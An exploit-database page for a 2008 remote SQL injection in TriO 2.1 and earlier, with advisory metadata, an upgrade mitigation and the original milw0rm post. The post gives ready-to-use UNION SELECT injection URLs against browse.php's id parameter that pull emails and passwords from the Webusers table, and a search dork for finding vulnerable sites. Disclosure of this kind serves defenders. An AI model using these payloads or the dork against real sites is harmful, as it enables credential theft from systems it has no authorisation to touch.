TriO - exploit.company

vendor:

TriO

by:

dun

9.3

CVSS

HIGH

SQL Injection

CWE

Product Name: TriO

Affected Version From: 2.1 and prior

Affected Version To: 2.1 and prior

Patch Exists: YES

Related CWE: N/A

CPE: a:willo:trio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TriO <= 2.1 Remote SQL Injection Vulnerability

TriO version 2.1 and prior are vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script browse.php. The vulnerable parameter is 'id' which can be used to inject arbitrary SQL code. An attacker can use this vulnerability to gain access to sensitive information such as usernames, passwords, and other data stored in the database.

Mitigation:

Upgrade to the latest version of TriO.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##############################################################
 #   [ TriO <= 2.1 ]   Remote SQL Injection Vulnerability     #
 ##############################################################
 # 
 # [ Script: "TriO, iO's new web-based module, enables you to quickly, easily, and securely make your collections..." ]
 #
 # [ Script site: http://www.willo.com/io/trio.asp ]
 # 
 # [ Default table_name with users: Webusers ]
 # 
 # [ Vuln: browse.php ]  
 # http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
 # http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--	
 #	
 # 
 # [ Dork example: "This website is powered by Trio" ]
 #
 #####################################################
 # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz..
 #####################################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-07-26]